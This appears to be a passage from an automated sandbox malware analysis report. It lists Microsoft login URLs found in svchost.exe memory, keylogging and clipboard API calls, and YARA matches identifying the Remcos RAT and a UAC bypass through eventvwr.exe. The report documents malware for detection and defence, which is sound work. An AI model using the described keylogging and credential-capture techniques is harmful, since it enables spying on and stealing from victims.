              Source: svchost.exe, 00000016.00000003.1421113174.00000127C5927000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3308666709.00000127C5067000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1421043981.00000127C596B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
              Source: svchost.exe, 00000016.00000002.3308666709.00000127C5067000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3308591628.00000127C502B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1421043981.00000127C596B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
              Source: svchost.exe, 00000016.00000003.1421113174.00000127C5927000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srfX
              Source: svchost.exe, 00000016.00000003.1420656517.00000127C593B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3308644935.00000127C505F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420875086.00000127C5940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
              Source: svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cpsrf
              Source: svchost.exe, 00000016.00000002.3308666709.00000127C5067000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1421043981.00000127C596B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
              Source: svchost.exe, 00000016.00000002.3308666709.00000127C5067000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1421043981.00000127C596B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1419925147.00000127C592C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
              Source: svchost.exe, 00000016.00000003.1420083064.00000127C5952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420621700.00000127C594D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1419925147.00000127C5929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1421450025.00000127C5956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
              Source: svchost.exe, 00000016.00000003.1420083064.00000127C5952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420621700.00000127C594D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1419925147.00000127C5929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
              Source: svchost.exe, 00000016.00000002.3308591628.00000127C502B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420621700.00000127C594D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3308618491.00000127C5047000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1419925147.00000127C5929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
              Source: svchost.exe, 00000016.00000002.3308591628.00000127C502B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1419925147.00000127C5929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
              Source: svchost.exe, 00000016.00000002.3308666709.00000127C5067000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1421043981.00000127C596B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
              Source: svchost.exe, 00000016.00000003.1419925147.00000127C592C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
              Source: svchost.exe, 00000016.00000002.3308618491.00000127C5047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.
              Source: svchost.exe, 00000016.00000003.1420621700.00000127C594D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
              Source: svchost.exe, 00000016.00000002.3308591628.00000127C502B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=8060
              Source: svchost.exe, 00000016.00000003.1420621700.00000127C594D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1419925147.00000127C5929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
              Source: svchost.exe, 00000016.00000003.1420083064.00000127C5952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420621700.00000127C594D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1419925147.00000127C5929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1421450025.00000127C5956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
              Source: svchost.exe, 00000016.00000003.1420083064.00000127C5952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420621700.00000127C594D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1419925147.00000127C5929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
              Source: svchost.exe, 00000016.00000003.1419925147.00000127C5929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
              Source: svchost.exe, 00000016.00000003.1420083064.00000127C5952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3308666709.00000127C5067000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3308591628.00000127C502B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1419925147.00000127C5929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
              Source: svchost.exe, 00000016.00000003.1420083064.00000127C5952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3308666709.00000127C5067000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3308591628.00000127C502B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1419925147.00000127C5929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
              Source: svchost.exe, 00000016.00000003.1420083064.00000127C5952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3308666709.00000127C5067000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3308591628.00000127C502B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1419925147.00000127C5929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
              Source: svchost.exe, 00000016.00000003.1420083064.00000127C5952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3308666709.00000127C5067000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3308591628.00000127C502B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1419925147.00000127C5929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420714728.00000127C5957000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
              Source: svchost.exe, 00000016.00000003.1420083064.00000127C5952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1419925147.00000127C5929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
              Source: svchost.exe, 00000016.00000002.3308618491.00000127C5047000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1419925147.00000127C592C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420014613.00000127C595A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
              Source: svchost.exe, 00000016.00000003.1420083064.00000127C5952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3308666709.00000127C5067000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3308591628.00000127C502B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1419925147.00000127C5929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
              Source: svchost.exe, 00000016.00000003.1420656517.00000127C593B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3308591628.00000127C502B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3308644935.00000127C505F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420875086.00000127C5940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
              Source: svchost.exe, 00000016.00000002.3308644935.00000127C505F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1441392975.00000127C50FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3309611722.00000127C60D1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
              Source: svchost.exe, 00000016.00000003.1420656517.00000127C593B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420875086.00000127C5940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf57
              Source: svchost.exe, 00000016.00000002.3308591628.00000127C502B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srf
              Source: svchost.exe, 00000016.00000002.3308666709.00000127C5067000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srfer
              Source: svchost.exe, 00000016.00000003.1420621700.00000127C594D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
              Source: svchost.exe, 00000016.00000003.1420621700.00000127C594D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
              Source: svchost.exe, 00000016.00000002.3308618491.00000127C5047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srf
              Source: svchost.exe, 00000016.00000003.1420656517.00000127C593B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420875086.00000127C5940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srfe
              Source: svchost.exe, 00000016.00000003.1420656517.00000127C593B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3308591628.00000127C502B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3308618491.00000127C5047000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420875086.00000127C5940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/retention.srf
              Source: svchost.exe, 00000016.00000002.3308906391.00000127C50E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srf
              Source: svchost.exe, 00000016.00000002.3308591628.00000127C502B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comps
              Source: svchost.exe, 00000016.00000002.3309287313.00000127C6077000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comx
              Source: svchost.exe, 00000016.00000002.3309287313.00000127C6077000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comxr
              Source: svchost.exe, 00000016.00000002.3308591628.00000127C502B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.m/
              Source: svchost.exe, 00000016.00000003.1420656517.00000127C593B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3308591628.00000127C502B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3308644935.00000127C505F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420875086.00000127C5940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
              Source: svchost.exe, 00000016.00000003.1420621700.00000127C594D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
              Source: svchost.exe, 00000016.00000002.3308618491.00000127C5047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srfs
              Source: svchost.exe, 00000016.00000003.1420621700.00000127C594D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
              Source: svchost.exe, 00000016.00000003.1420621700.00000127C594D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
              Source: svchost.exe, 00000016.00000003.1420621700.00000127C594D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
              Source: svchost.exe, 00000016.00000002.3308591628.00000127C502B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420621700.00000127C594D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.3307925667.00000127C5066000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420940557.00000127C5963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
              Source: svchost.exe, 00000016.00000002.3308618491.00000127C5047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
              Source: svchost.exe, 00000016.00000002.3308591628.00000127C502B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srf
              Source: svchost.exe, 00000016.00000003.1421113174.00000127C5927000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srfMM
              Source: svchost.exe, 00000016.00000002.3308618491.00000127C5047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srfres
              Source: svchost.exe, 00000016.00000002.3308618491.00000127C5047000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
              Source: svchost.exe, 00000016.00000003.1420656517.00000127C593B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3308591628.00000127C502B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420621700.00000127C594D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3308618491.00000127C5047000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420083064.00000127C5955000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1420875086.00000127C5940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1419925147.00000127C592C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signup.live.com/signup.aspx

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_00409340 SetWindowsHookExA 0000000D,0040932C,0000000013_2_00409340
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard,13_2_0040A65A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_00414EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,13_2_00414EC1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_00414EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,19_2_00414EC1
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_00414EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,29_2_00414EC1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard,13_2_0040A65A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_00409468 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,13_2_00409468

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 29.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 19.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.svchost.exe.13f4f101900.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 39.2.svchost.exe.1c227360bd8.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.svchost.exe.20a4568b350.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.svchost.exe.20a45700998.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.svchost.exe.13f4f08c2b8.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.svchost.exe.138aa701bf0.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 19.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 39.2.svchost.exe.1c2272eb590.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.svchost.exe.20a45700998.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.svchost.exe.138aa68c5a8.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.svchost.exe.13f4f101900.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.svchost.exe.13f4f08c2b8.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.svchost.exe.138aa701bf0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.svchost.exe.20a4568b350.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 39.2.svchost.exe.1c227360bd8.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.svchost.exe.138aa68c5a8.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 39.2.svchost.exe.1c2272eb590.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000013.00000002.1399874525.00000000050A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.3811250705.0000000005577000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.1528643546.0000013F4F016000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.1493095561.0000000002E87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.1492594141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002C.00000002.1577698674.0000000004E4B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.1595202046.00000138AA616000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.1546946748.0000020A45615000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000027.00000002.1623163422.000001C227275000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7964, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8048, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: csc.exe PID: 8164, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: ngen.exe PID: 7544, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1072, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wmplayer.exe PID: 2052, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7920, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 7172, type: MEMORYSTR

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_0041A76C SystemParametersInfoW,13_2_0041A76C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_0041A76C SystemParametersInfoW,19_2_0041A76C
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_0041A76C SystemParametersInfoW,29_2_0041A76C

              System Summary

              barindex
              Source: 29.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 29.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 29.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 19.2.ngen.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 19.2.ngen.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 19.2.ngen.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 12.2.svchost.exe.13f4f101900.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 12.2.svchost.exe.13f4f101900.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 12.2.svchost.exe.13f4f101900.1.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 39.2.svchost.exe.1c227360bd8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 39.2.svchost.exe.1c227360bd8.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
